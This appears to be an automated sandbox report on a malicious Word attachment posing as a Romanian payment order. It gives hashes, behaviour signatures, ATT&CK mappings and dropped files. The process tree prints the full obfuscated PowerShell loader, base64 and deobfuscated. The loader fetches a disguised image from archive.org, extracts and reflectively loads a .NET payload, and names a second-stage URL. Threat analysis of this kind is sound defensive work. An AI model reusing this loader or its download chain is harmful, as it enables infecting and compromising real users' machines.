576967b419975a113a701e12c15d88f112999433d2f2015cdd703b495c9f683a

General

Target

ordin de plată.docx
Size

263KB
MD5

2d20284313333f0385ad8a987114c363
SHA1

94cfb99f0653f2af35b1e6060ca937c449aba733
SHA256

576967b419975a113a701e12c15d88f112999433d2f2015cdd703b495c9f683a
SHA512

4b8d59a9fbbcd2bc7ab9e62b34fff30ede515c233f1018baeaea93bd4be3d98ee6a3e4eac862ba9d9524e012db328bce14739b1ac4e4c20b85cd089bddffeb8c
SSDEEP

6144:RJwFUSQxWaMdVe0ic9vlN2xfMbbnlR8ybMfAKuBg:fweSsWaMKavbtbno485u6

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20

exe.dropper

https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg%20

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
12	2720	EQNEDT32.EXE
14	800	powershell.exe
15	800	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1912	powershell.exe
800	powershell.exe

Abuses OpenXML format to download file from external location

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2720	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2868	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1912	powershell.exe
800	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	800	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2868	WINWORD.EXE
2868	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2720 wrote to memory of 2500	2720	EQNEDT32.EXE	30
PID 2720 wrote to memory of 2500	2720	EQNEDT32.EXE	30
PID 2720 wrote to memory of 2500	2720	EQNEDT32.EXE	30
PID 2720 wrote to memory of 2500	2720	EQNEDT32.EXE	30
PID 2500 wrote to memory of 1912	2500	WScript.exe	31
PID 2500 wrote to memory of 1912	2500	WScript.exe	31
PID 2500 wrote to memory of 1912	2500	WScript.exe	31
PID 2500 wrote to memory of 1912	2500	WScript.exe	31
PID 2868 wrote to memory of 1700	2868	WINWORD.EXE	34
PID 2868 wrote to memory of 1700	2868	WINWORD.EXE	34
PID 2868 wrote to memory of 1700	2868	WINWORD.EXE	34
PID 2868 wrote to memory of 1700	2868	WINWORD.EXE	34
PID 1912 wrote to memory of 800	1912	powershell.exe	36
PID 1912 wrote to memory of 800	1912	powershell.exe	36
PID 1912 wrote to memory of 800	1912	powershell.exe	36
PID 1912 wrote to memory of 800	1912	powershell.exe	36

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ordin de plată.docx"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2868
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1700

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2720
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\servicegoodfornaturalthinggood.vbS"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2500
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRQc0hvbWVbNF0rJHBTSE9NRVszNF0rJ1gnKSAoICgnY0dmaW1hZ2VVcmwgPSBBekVodHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyLycrJ2l0ZW1zL2RldGFoJysnLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3RlX1YuanBnIEF6RTtjR2Z3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2NHZmltYWdlQnl0ZXMgPSBjR2Z3ZWJDbGllbnQuRG93bicrJ2xvYWREYXRhKGNHJysnZicrJ2ltYWcnKydlVXJsKTtjR2ZpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhjR2ZpbWFnZUInKyd5dGUnKydzKTtjR2ZzdGFydEZsYWcgPSBBekU8PEJBU0U2NF9TVEFSVD4+QXpFO2NHZmVuZEZsYWcgPSBBekU8PEJBU0U2NF9FTkQ+PkF6RTtjR2ZzdGFydCcrJ0luZGV4ID0gY0dmaW1hZ2VUZXh0LkluZGV4T2YoY0dmc3RhcnRGbGFnKTtjR2ZlbmRJbmRleCA9IGNHZmltYWdlVGV4dC5JbmRleE9mKGNHZmVuZEZsYWcpO2NHZnN0YXJ0SW5kZXggLWdlIDAgLWFuZCBjR2ZlbmRJbmRleCAtZycrJ3QgY0dmc3RhcnRJbmRleDtjR2ZzdGFydEluZGV4ICs9IGNHZnMnKyd0YXJ0RmxhZy5MZW5ndGg7Y0dmYmFzZTY0TGVuZ3RoID0gY0cnKydmZW5kSW5kZXggLSBjR2ZzdGFydEluZGV4O2NHZmJhc2U2NENvbW1hbmQgPScrJyBjR2ZpbWFnZVRleHQuJysnU3Vic3RyaW5nKGNHZnN0YXJ0SW5kZXgsIGNHZmJhc2U2NExlbmd0aCk7Y0dmY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhjR2ZiYXNlNjQnKydDb21tYW5kKTtjR2Zsb2FkZWRBc3NlbScrJ2JseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoY0dmY29tbWFuZEJ5dGVzKTtjR2Z2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG8nKydkKEF6RVZBSUF6RSk7Y0dmdmFpTWV0aG9kLkludm9rZShjR2ZudWxsLCBAKEF6RXR4dC5HREZSUlcvMzQzMy8wNy41NjEuNDguMy8vOnB0dGhBekUsIEF6RWRlc2F0aXZhZG9BekUsIEF6RWRlc2F0aXZhZG9BekUsIEF6RWRlc2F0aXZhZG9BekUsIEF6RVJlJysnZ0FzbUF6RSwgQXpFZGVzYXRpdmFkbycrJ0F6RSwgQXpFZGVzYXRpdmFkb0F6RSkpJysnOycpLnJlcExBY0UoKFtDaGFyXTY1K1tDaGFyXTEyMitbQ2hhcl02OSksW1NUcmlOR11bQ2hhcl0zOSkucmVwTEFjRSgoW0NoYXJdOTkrW0NoYXJdNzErW0NoYXJdMTAyKSxbU1RyaU5HXVtDaGFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1912
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PsHome[4]+$pSHOME[34]+'X') ( ('cGfimageUrl = AzEhttps://ia600102.us.archive.org/32/'+'items/detah'+'-note-v_202410/DetahNote_V.jpg AzE;cGfwebClient = New-Object System.Net.WebClient;cGfimageBytes = cGfwebClient.Down'+'loadData(cG'+'f'+'imag'+'eUrl);cGfimageText = [System.Text.Encoding]::UTF8.GetString(cGfimageB'+'yte'+'s);cGfstartFlag = AzE<<BASE64_START>>AzE;cGfendFlag = AzE<<BASE64_END>>AzE;cGfstart'+'Index = cGfimageText.IndexOf(cGfstartFlag);cGfendIndex = cGfimageText.IndexOf(cGfendFlag);cGfstartIndex -ge 0 -and cGfendIndex -g'+'t cGfstartIndex;cGfstartIndex += cGfs'+'tartFlag.Length;cGfbase64Length = cG'+'fendIndex - cGfstartIndex;cGfbase64Command ='+' cGfimageText.'+'Substring(cGfstartIndex, cGfbase64Length);cGfcommandBytes = [System.Convert]::FromBase64String(cGfbase64'+'Command);cGfloadedAssem'+'bly = [System'+'.Reflection.Assembly]::Load(cGfcommandBytes);cGfvaiMethod = [dnlib.IO.Home].GetMetho'+'d(AzEVAIAzE);cGfvaiMethod.Invoke(cGfnull, @(AzEtxt.GDFRRW/3433/07.561.48.3//:ptthAzE, AzEdesativadoAzE, AzEdesativadoAzE, AzEdesativadoAzE, AzERe'+'gAsmAzE, AzEdesativado'+'AzE, AzEdesativadoAzE))'+';').repLAcE(([Char]65+[Char]122+[Char]69),[STriNG][Char]39).repLAcE(([Char]99+[Char]71+[Char]102),[STriNG][Char]36))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:800

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{3941EF33-F8F7-408D-94E3-0454A3C0B9D3}.FSD

Filesize
128KB

MD5
127fc826b8ca138600a20b8a18ca39ed

SHA1
bab700d0000cfd278708cceb9a537015be6d1468

SHA256
049c6ced719690d442907df06d4bbd95a7765355b80d9d093399e177c810bc89

SHA512
738b30a8241d2889f56a8b569ac07f541780ab0f7b06e5a618204900ad72ae907476f1046305ad0ba47cd846c8d0da82cffc10443f7978677573e98948b7ed4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Filesize
128KB

MD5
6b33632ee9eb88c231917c66aa4c3fb2

SHA1
ff9e79ebb92362968c9e46eb786613c3698fa8b0

SHA256
d75d2cf6323ac56437edc72225f15361c2aafb5def4d05a012b9846a7e3bad2a

SHA512
e2cac0e7b164fcf2568bca51d048293e4f0c3134c49dcc7a55db9aaa27efb10e589e58593bc87e0a110ddbc434b5a8ab07830e6095354d08d40b436ffbb9c0af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{6E9D54D0-7FD0-4344-8500-B817DA7C0D93}.FSD

Filesize
128KB

MD5
72bb86c9258d499ed1d31c9319421907

SHA1
03beb09d88fe65a87ee8568d7a996492cf8a06e5

SHA256
ec0acf3896650eace4eb7060d6c7dc3466a3576441735947df3bb1a0fb9813c8

SHA512
efbef6dd4d6087bd1a463b0bd4406ca5c5f65c422bd74d994caf6eb8a48b8ec5df42a151827288026e5c3def41cbc62b34ee4a035bf0bb186ba706c773e46fcd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Q0WBLVJY\naturegustgoodgreatthingstobewithmeiamnice_________greatnewforeveryonetogetmegreatthingsbelinetonews_________verycutergreatthingseverytimehappymoements[1].doc

Filesize
97KB

MD5
f31ba8351265a427efdf3b2d24ec6fab

SHA1
0dc5a1c62306ff5e581a15408edc7ea15433a6d2

SHA256
55ba7cdf4f44829fb470c66da2e831fe28596a2fcc33b74c0f8f6117786af040

SHA512
1d70947a6fd849db0df28e79ed830a40355c569b4a89cf7e135deed8077f9089f5f4d3f61ea416537895204e24abf2fcc11406385e600d8410e349a1d06ffd20

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\58DFD030.emf

Filesize
182KB

MD5
00e9efb518bbe50211f08bec409fdea6

SHA1
f51dee5bd75a6355db7a75a8942e943c6899810e

SHA256
9024832938e597418cd7607ea8d52dd0ab41a4bb2b01336119c956260a4e4cd1

SHA512
0a1086e8b6d004a89c16a775b582fc22e0d47f464b7809e84ac444daccc48ed76176ab28ef8e820880ee0802653c2632627fcfa7563b1c7befb7b270fe2210e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\{AD34B0CD-02FD-402D-A9ED-7C10C17F337D}

Filesize
128KB

MD5
724dcca1cce5a23349f0cf7ef544983b

SHA1
802a7ee5900d4a23b6a1f2ad334796406159c9b5

SHA256
236e62f3833ba6654abfaab3709d45c3a99ff29df903b7b54e6a17165d7325fa

SHA512
797843c24942e9ca9d6292a1d912d1d81881c80195cd8a09262fbf62b42bad54183418c41f3f0a12a60fb6ea07c804a708dfa98c98937468a14567677e9d1e2c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
97fd5e33dc44018653eb2693e9b3fc0c

SHA1
ae88d0691018285af56542aabe3fe8d83f46617d

SHA256
9f2b2ee6b3d8c33d134cfad44ac991f1c4c2d58a890b3760611bfdacb9061c5d

SHA512
9e0e6882ebf9b1b048db12b93b8035fa9d3eeac6d2d76fc1ee555735b6ebbe3834a6a8abda815e5aa487c1c6777db70752757d839b89c361baa98c7cb06068ca

Download Submit
C:\Users\Admin\AppData\Roaming\servicegoodfornaturalthinggood.vbS

Filesize
190KB

MD5
b8c00ee73ed137a19e03920a03f80292

SHA1
d414493aaa6f1c167409a997f73b0f52fb04c0fa

SHA256
0cd60fbe4e65b7cbd036ee3e99507efa509970ab58c632bc49a4bcca2b05bd89

SHA512
fa7a2767f17ef3a4a4bfec94f0d3db894ad7d658c582612da295d16e6c970a088a7ee7079798a599847fd49c957f011143e37a5828362c63c0953285839ba3c2

Download Submit
memory/2868-0-0x000000002F1B1000-0x000000002F1B2000-memory.dmp

Filesize
4KB

Download
memory/2868-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2868-2-0x000000007111D000-0x0000000071128000-memory.dmp

Filesize
44KB

Download
memory/2868-131-0x000000007111D000-0x0000000071128000-memory.dmp

Filesize
44KB

Download

Analysis

Sharing